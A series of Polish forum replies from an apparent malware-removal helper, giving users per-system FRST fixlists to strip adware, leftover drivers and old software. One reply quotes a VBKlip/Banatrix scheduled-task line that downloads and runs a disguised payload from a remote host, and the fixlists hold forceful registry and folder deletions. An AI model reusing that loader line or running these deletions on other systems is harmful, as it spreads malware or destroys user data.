C:\Users\NAS Tower\AppData\Local\03000200-1426602568-0500-0006-000700080009 C:\Users\NAS Tower\AppData\Local\Google C:\Users\NAS Tower\AppData\Roaming\03000200-1426602356-0500-0006-000700080009 C:\Users\NAS Tower\Downloads\*(*)-dp*.exe Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Folder: C:\Program Files (x86)\Mozilla Firefox EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Historia > Wyczyść historię przeglądania menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszrzenia trzeba będzie przeinstalować. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Wypowiedz się czy jest poprawa.

Ostatnio byłam nieobecna, kłopoty osobiste. W systemie widać dwa czynne sterowniki StdLib po nieudolnej deinstalacji adware Greener Web (te sterowniki zwykle nie są deinstalowane). Widać też, że w obrotach był szkodliwy "Asystent pobierania" dobrychprogramów: KLIK. Dodatkowe podejrzenia w kwestii spowolnienia budzi też przeciwna strona, czyli sfatygowany Norton Internet Security (stare sterowniki i komponenty z 2012). Proponuję więc go odinstalować. 1. Deinstalacje: - Poprzez Panel sterowania odinstaluj stare wersje: Adobe Flash Player 16 ActiveX, Adobe Flash Player 16 NPAPI, Java 8 Update 31, Norton Internet Security, Norton Online Backup. - Następnie wejdź w Tryb awaryjny i zastosuj firmowy Norton Removal Tool. - W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj Norton Security Toolbar, o ile nadal będzie widoczny po w/w deinstalacjach. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64; C:\Windows\System32\drivers\{9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64.sys [61112 2014-04-28] (StdLib) R1 {a3f28269-ad17-41a8-b032-3e0313ef8979}w64; C:\Windows\System32\drivers\{a3f28269-ad17-41a8-b032-3e0313ef8979}w64.sys [61120 2014-06-11] (StdLib) S2 Update Greener Web; "C:\Program Files (x86)\Greener Web\updateGreenerWeb.exe" [X] S2 Util Greener Web; "C:\Program Files (x86)\Greener Web\bin\utilGreenerWeb.exe" [X] S3 XFDriver64; \??\C:\Program Files (x86)\Xfire2\XFDriver64.sys [X] Task: {103A2920-F0C0-4006-9983-D24951FAB841} - System32\Tasks\{F56562F1-88F6-42B3-BF71-D32F694875E8} => C:\Program Files\NokiaFREE Unlock Codes Calculator\_NokiaFREE_Calc.exe Task: {4A50B026-9B51-4FF5-BCAC-E1C88369864C} - System32\Tasks\{E1CC409B-9CEA-4830-9BB9-E2707297CCE3} => pcalua.exe -a "C:\Users\samsung\Downloads\filehost_FIFA 14 Origin Key Generator.exe" -d C:\Users\samsung\Downloads Task: {73178EA7-241D-4D6F-AA4E-3CE6123E9E92} - System32\Tasks\{E1D7F4A8-0188-4596-9CB2-19228813D123} => C:\Program Files\NokiaFREE Unlock Codes Calculator\NokiaFREE_Calc.exe Task: {8D81F7A1-4DC7-4E3F-80BC-23E13126FD39} - System32\Tasks\{56A8C543-3339-43C0-9D5D-2BBB2BEA22EB} => pcalua.exe -a "D:\Cultures 2\Setup.exe" -d "D:\Cultures 2" Task: {8E472DE3-1CA9-4AFD-BB4C-5DA3D3CDBF75} - System32\Tasks\{777FFCBD-0174-4810-860A-9293BB82BFF8} => pcalua.exe -a C:\Users\samsung\Downloads\WorldUnlock_v44_Setup-NOKIA_free\WorldUnlock_v44_Setup\WorldUnlock_v44_Setup.exe -d C:\Users\samsung\Downloads\WorldUnlock_v44_Setup-NOKIA_free\WorldUnlock_v44_Setup Task: {B578E9E8-3257-4AD6-947A-A7BD29646651} - System32\Tasks\{C425A6E2-B0EA-4C80-9139-950021EA0FD1} => C:\Program Files\NokiaFREE Unlock Codes Calculator\_NokiaFREE_Calc.exe Task: {CEC982D1-D934-4436-95F6-06900E922A21} - System32\Tasks\{0FCA6DAD-BFE1-4325-8DA0-810D7A2D5B04} => C:\Program Files\NokiaFREE Unlock Codes Calculator\_NokiaFREE_Calc.exe Task: {EEBCEB77-23E1-4CA8-947E-1E937A52D34F} - System32\Tasks\{3F8273B6-65FE-4D09-985C-99B30A314428} => C:\Program Files\NokiaFREE Unlock Codes Calculator\_NokiaFREE_Calc.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150410 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150410 HKU\S-1-5-21-4209209786-2917733824-1122995674-1001\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150410 SearchScopes: HKLM-x32 -> DefaultScope {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1708250 SearchScopes: HKLM-x32 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1708250 SearchScopes: HKU\S-1-5-21-4209209786-2917733824-1122995674-1001 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1708250 Toolbar: HKU\S-1-5-21-4209209786-2917733824-1122995674-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File C:\Program Files\Common Files\WinPcapNmap.exe C:\Program Files (x86)\Opera C:\ProgramData\{*}.log C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPlayCity.com C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NokiaFREE Calculator C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VATowiec C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WorldUnlock Calculator C:\Users\samsung\AppData\Local\Opera Software C:\Users\samsung\AppData\Roaming\Opera Software C:\Users\samsung\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Billiards Club.lnk C:\Users\samsung\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Play Games.lnk C:\Users\samsung\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk C:\Users\samsung\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Live for Speed C:\Users\samsung\AppData\Roaming\Microsoft\Word\Wniosek-dotacja-2013-1%20(1)303557920112727497\Wniosek-dotacja-2013-1%20(1).doc.lnk C:\Users\samsung\Desktop\Programiki [RÓŻNIASTE]\CamStudio.lnk C:\Users\samsung\Desktop\Programiki [RÓŻNIASTE]\CC Get MAC Address.lnk C:\Users\samsung\Desktop\Programiki [RÓŻNIASTE]\ipla.lnk C:\Users\samsung\Desktop\Programiki [RÓŻNIASTE]\KaraFun Player 2.lnk C:\Users\samsung\Desktop\Programiki [RÓŻNIASTE]\tatowy\MOTIKO\VATowiec.lnk C:\Users\samsung\Desktop\Programiki [RÓŻNIASTE]\Gosia - harcerstwo\NOKIA LUMIA 520\Szachy\Książki szachowe\Taktyka\Konotop-Testy_po_taktike_dlya_shahmatistov_III_razryada\Gry i zabawy (attracting).lnk C:\Users\samsung\Downloads\*(*)-dp*.exe C:\Users\samsung\Downloads\pobierz_*.exe C:\Users\samsung\Downloads\OriginThinSetup (*).exe C:\Users\UpdatusUser\Desktop\*.lnk C:\Windows\System32\drivers\{9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64.sys C:\Windows\System32\drivers\{a3f28269-ad17-41a8-b032-3e0313ef8979}w64.sys C:\windows\SysWOW64\*.tmp CMD: for /d %f in (C:\Users\samsung\AppData\Local\{*}) do rd /s /q "%f" Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa raporty. Dołącz też plik fixlog.txt. Wypowiedz się czy są pozytywne zmiany.

W tle działa aktywne adware Techgile okopane mnóstwem sterowników, poza tym ogólne śmietnisko i bardzo stare wersje przeglądarek (notabene zabrudzonych). Akcje do przeprowadzenia: 1. Przez Panel sterowania odinstaluj: - Adware Delta Chrome Toolbar, FoxTab FLV Player, FoxTab PDF Reader, IncrediMail MediaBar 2 Toolbar oraz podejrzany Tibia MULTI-ip changer. - Stare wersje i zbędniki: ACE Mega CoDecS Pack, Adobe Flash Player 16 ActiveX, Adobe Reader 9.5.5 - Polish, Akamai NetSession Interface, Facebook Messenger 2.1.4814.0, Google Chrome, Java 7 Update 55, Mozilla Firefox 10.0.2 (x86 pl). Facebook Messenger to historyczny produkt. Przy deinstalacji Firefox i Google Chrome wybierz opcję Usuń także dane przeglądarki. Na razie nie instaluj żadnych nowych wersji, w punkcie 2 będzie usuwanie komponentów tych przeglądarek. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {049bbcc5-fa2f-4f64-ac57-0d003a8907b3}Gw64; C:\Windows\System32\drivers\{049bbcc5-fa2f-4f64-ac57-0d003a8907b3}Gw64.sys [48784 2014-10-28] (StdLib) R1 {55685567-4840-4a91-962b-49a412e9485a}Gw64; C:\Windows\System32\drivers\{55685567-4840-4a91-962b-49a412e9485a}Gw64.sys [61112 2014-05-27] (StdLib) R1 {69f4939e-c3db-4f47-938c-0519bbf69309}Gw64; C:\Windows\System32\drivers\{69f4939e-c3db-4f47-938c-0519bbf69309}Gw64.sys [48784 2014-10-27] (StdLib) R1 {7d71b13c-fa47-4ddb-a69a-0fd038af3e02}Gw64; C:\Windows\System32\drivers\{7d71b13c-fa47-4ddb-a69a-0fd038af3e02}Gw64.sys [48784 2015-04-06] (StdLib) R1 {9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64; C:\Windows\System32\drivers\{9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64.sys [61112 2014-05-12] (StdLib) S2 gupdate1caf048fc0435a0; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [133104 2010-05-10] (Google Inc.) S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [119512 2014-04-22] (Malwarebytes Corporation) R2 Update Techgile; C:\Program Files (x86)\Techgile\updateTechgile.exe [397040 2015-04-12] () R2 Util Techgile; C:\Program Files (x86)\Techgile\bin\utilTechgile.exe [397040 2015-04-12] () S3 cpuz130; \??\C:\Users\ADMINI~1\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S2 NMSAccessU; C:\Users\Adrian\AppData\Local\Temp\{542FA3D1-2289-4CD8-82B1-EE222BA2B814}\NMSAccessU.exe [X] S3 NVHDA; system32\drivers\nvhda64v.sys [X] Task: {9980A57F-63A0-4A00-AA97-4C8B74F6977D} - System32\Tasks\{111B60CC-5B99-4BDC-AC5F-426233FB526E} => pcalua.exe -a D:\Metin2_20080908.exe -d D:\ Task: {AA716098-337D-4AA9-AF35-3D13169C979A} - \WPD\SqmUpload_S-1-5-21-511461997-2466024275-2353699939-500 No Task File Task: {EFC92F18-8431-41ED-86A8-C524E71BE8DE} - System32\Tasks\EPUpdater => C:\Users\Adrian\AppData\Roaming\BabSolution\Shared\BabMaint.exe [2013-06-06] () Task: {F3A32570-EBC7-4D68-8AC0-9CF5766FF3C6} - System32\Tasks\BitGuard => Sc.exe start BitGuard HKLM-x32\...\Run: [NPSStartup] => [X] AppInit_DLLs: c:\progra~3\bitguard\271832~1.68\{c16c1~1\loader.dll => c:\progra~3\bitguard\271832~1.68\{c16c1~1\loader.dll File Not Found AppInit_DLLs: c:\progra~3\bitguard\271769~1.27\{c16c1~1\loader.dll => c:\progra~3\bitguard\271769~1.27\{c16c1~1\loader.dll File Not Found GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HKU\S-1-5-21-511461997-2466024275-2353699939-1000\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=AV01 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-511461997-2466024275-2353699939-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01 HKU\S-1-5-21-511461997-2466024275-2353699939-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://q.search-simple.com/?affID=na HKU\S-1-5-21-511461997-2466024275-2353699939-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.msn.com/?PC=AV01 URLSearchHook: HKLM-x32 - (No Name) - {d40b90b4-d3b1-4d6b-a5d7-dc041c1b76c0} - No File SearchScopes: HKLM-x32 -> DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01 SearchScopes: HKLM-x32 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = http://startsear.ch/?aff=1&src=sp&cf=946f9eea-663b-11e1-bbbc-6cf04974a08f&q={searchTerms} SearchScopes: HKLM-x32 -> {117CEF7C-958C-4856-BB3A-CF81FA8209DD} URL = http://search.sweetim.com/search.asp?src=6&q={searchTerms}&barid={869E18E1-7133-11E1-930B-6CF04974A08F} SearchScopes: HKLM-x32 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01 SearchScopes: HKLM-x32 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1098640 SearchScopes: HKLM-x32 -> {CFF4DB9B-135F-47c0-9269-B4C6572FD61A} URL = http://startsear.ch/?aff=2&src=sp&cf=946f9eea-663b-11e1-bbbc-6cf04974a08f&q={searchTerms} SearchScopes: HKLM-x32 -> {EEE7E0A3-AE64-4dc8-84D1-F5D7BAF2DB0C} URL = http://slirsredirect.search.aol.com/slirs_http/sredir?sredir=2685&query={searchTerms}&invocationType=tb50winampie7 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = http://search.babylon.com/?q={searchTerms}&affID=119535&tt=gc_&babsrc=SP_ss_gin2g&mntrId=CEB66CF04974A08F SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {117CEF7C-958C-4856-BB3A-CF81FA8209DD} URL = http://search.sweetim.com/search.asp?src=6&q={searchTerms}&barid={869E18E1-7133-11E1-930B-6CF04974A08F} SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL = http://websearch.ask.com/custom/java/redirect?client=ie&tb=ORJ&o=100000026&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL = SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {5727E0A1-B0BA-4888-96B0-C9C348D0C33E} URL = http://mystart.incredimail.com/mb68/?search={searchTerms}&loc=search_box&u=92260265520678787 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {A2FBF33A-96E6-4651-9B87-42DBE2B8FEC0} URL = http://q.search-simple.com/?affID=na&q={searchTerms}&r=187 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {AD22EBAF-0D18-4fc7-90CC-5EA0ABBE9EB8} URL = http://www.daemon-search.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1098640 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {CFF4DB9B-135F-47c0-9269-B4C6572FD61A} URL = http://startsear.ch/?aff=2&src=sp&cf=946f9eea-663b-11e1-bbbc-6cf04974a08f&q={searchTerms} SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {EEE7E0A3-AE64-4dc8-84D1-F5D7BAF2DB0C} URL = http://slirsredirect.search.aol.com/slirs_http/sredir?sredir=2685&query={searchTerms}&invocationType=tb50winampie7 SearchScopes: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> {F650D391-5523-4ABD-B34D-C72502C83D97} URL = http://search.babylon.com/?q={searchTerms}&AF=110810&babsrc=SP_ss&mntrId=ceb6f6ff0000000000000060b307721f BHO-x32: No Name -> {d40b90b4-d3b1-4d6b-a5d7-dc041c1b76c0} -> No File BHO-x32: No Name -> {ecdee021-0d17-467f-a1ff-c7a115230949} -> No File Toolbar: HKLM - No Name - {32099AAC-C132-4136-9E9A-4E364A424E17} - No File Toolbar: HKLM - avast! WebRep - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File Toolbar: HKLM-x32 - No Name - {d40b90b4-d3b1-4d6b-a5d7-dc041c1b76c0} - No File Toolbar: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File Toolbar: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File Toolbar: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> No Name - {32099AAC-C132-4136-9E9A-4E364A424E17} - No File Toolbar: HKU\S-1-5-21-511461997-2466024275-2353699939-1000 -> No Name - {D40B90B4-D3B1-4D6B-A5D7-DC041C1B76C0} - No File DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} https://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab C:\Program Files (x86)\DAEMON Tools Toolbar C:\Program Files (x86)\DealPly C:\Program Files (x86)\Google C:\Program Files (x86)\Mozilla Firefox C:\Program Files (x86)\Techgile C:\Program Files (x86)\Winamp Toolbar C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Metin2\Metin2 PL.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaxUp Video Downloader.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ares C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DealPly C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FIFA 12 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja Klasyki\Kozacy - Antologia C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RelevantKnowledge C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tiveria C:\ProgramData\Mozilla C:\ProgramData\Temp C:\Users\Adrian\cm0304.exe C:\Users\Adrian\AppData\Local\*.html C:\Users\Adrian\AppData\Local\{A09B6328-7909-4D8D-81B5-121C073EA055} C:\Users\Adrian\AppData\Local\cache C:\Users\Adrian\AppData\Local\Google C:\Users\Adrian\AppData\Local\Mobogenie C:\Users\Adrian\AppData\Local\Mozilla C:\Users\Adrian\AppData\Local\Pay-By-Ads C:\Users\Adrian\AppData\Roaming\BabMaint.exe C:\Users\Adrian\AppData\Roaming\LiveSupport.exe_log.txt C:\Users\Adrian\AppData\Roaming\regsvr32.exe_log.txt C:\Users\Adrian\AppData\Roaming\BabSolution C:\Users\Adrian\AppData\Roaming\File Scout C:\Users\Adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk C:\Users\Adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\FIFA 12.lnk C:\Users\Adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Winamp (2).lnk C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BitGuard C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FoxTab FLV Player C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MKJogo C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mobogenie C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Lollipop C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\FoxTab PDF Reader C:\Users\Adrian\AppData\Roaming\Mozilla C:\Users\Adrian\Desktop\Płyty i muzyka\Play League of Legends.lnk C:\Users\Adrian\Desktop\Płyty i muzyka\TeamSpeak 3 Client.lnk C:\Users\Adrian\Desktop\Płyty i muzyka\wolne kawałki rap\Głebia tożsamości(promo).lnk C:\Users\Adrian\Desktop\Płyty i muzyka\Origin Games\FIFA 12\Support\Plik Przeczytaj.lnk C:\Users\Adrian\Documents\Microsoft Office PowerPoint 2003.lnk C:\Users\Adrian\Downloads\yet_another_cleaner_hdr.exe C:\Users\Ilona\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Ilona\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Ilona\Desktop\Ares.lnk C:\Users\Ilona\Desktop\Google Chrome.lnk C:\Users\Ilona\Desktop\Kozacy - Powrót na wojnę.lnk C:\Users\Ilona\Desktop\Metin2 PL.lnk C:\Users\Ilona\Desktop\Tiveria.lnk C:\Users\TomeczeK\AppData\Local\Microsoft\Windows\GameExplorer\{1B224F7B-114E-4F42-B3E5-3BCF3E141AA9 C:\Users\TomeczeK\Desktop\Ares.lnk C:\Users\TomeczeK\Desktop\Heroes of Might and Magic V.lnk C:\Users\TomeczeK\Desktop\Metin2 PL.lnk C:\Users\TomeczeK\Desktop\Tiveria.lnk C:\Users\TomeczeK\Desktop\nieurzywane\Hitman - Krwawa forsa.lnk C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*.lnk C:\Windows\pss\debug.log.Startup C:\Windows\System32\drivers\{049bbcc5-fa2f-4f64-ac57-0d003a8907b3}Gw64.sys C:\Windows\System32\drivers\{55685567-4840-4a91-962b-49a412e9485a}Gw64.sys C:\Windows\System32\drivers\{69f4939e-c3db-4f47-938c-0519bbf69309}Gw64.sys C:\Windows\System32\drivers\{7d71b13c-fa47-4ddb-a69a-0fd038af3e02}Gw64.sys C:\Windows\System32\drivers\{9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64.sys C:\Windows\system32\drivers\MBAMSwissArmy.sys Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Adrian^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^debug.log" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ApnUpdater" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Lite" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\msnmsgr" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SweetIM" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Są tu trzy konta w użyciu, z każdego muszą być dostarczone raporty FRST: ==================== Accounts: ============================= Adrian (S-1-5-21-511461997-2466024275-2353699939-1000 - Administrator - Enabled) => C:\Users\Adrian Ilona (S-1-5-21-511461997-2466024275-2353699939-1003 - Limited - Enabled) => C:\Users\Ilona TomeczeK (S-1-5-21-511461997-2466024275-2353699939-1004 - Limited - Enabled) => C:\Users\TomeczeK Po kolei zaloguj się na każde poprzez pełny restart komputera (a nie Wyloguj czy Przełącz użytkownika), na każdym zrób nowe logi FRST z opcji Scan (zaznaczone pole Addition, by powstały po dwa logi z kadego konta). Na kontach limitowanych Ilona i Tomeczek FRST startuj przez dwuklik a nie "Uruchom jako Administrator" (to zmieni kontekst kont na Adriana). Dołącz też plik fixlog.txt.

W systemie rezyduje wariant VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań: Task: {A7F008C4-62AB-406C-99E6-6EFED26D80EA} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grogle.in/dat.bmp?data=UPc5bO93E9;Sony_Movie_Studio_Platinum_12.0.896_64-bit.exe;1423084229 & start cmd /R dat.bmp Poza tym są drobne śmieci w Firefox (vShare), prawdopodobnie "skrupulatnie" sejwowane via MozillaBackup... Akcja do przeprowadzenia: 1. Przez Panel sterowania odinstaluj stare wersje: Adobe Flash Player 14 ActiveX, Java 7 Update 25 (64-bit), Java 8 Update 31 (64-bit), Java 8 Update 31, Mozilla ActiveX Control v1.7.12. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {A7F008C4-62AB-406C-99E6-6EFED26D80EA} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp 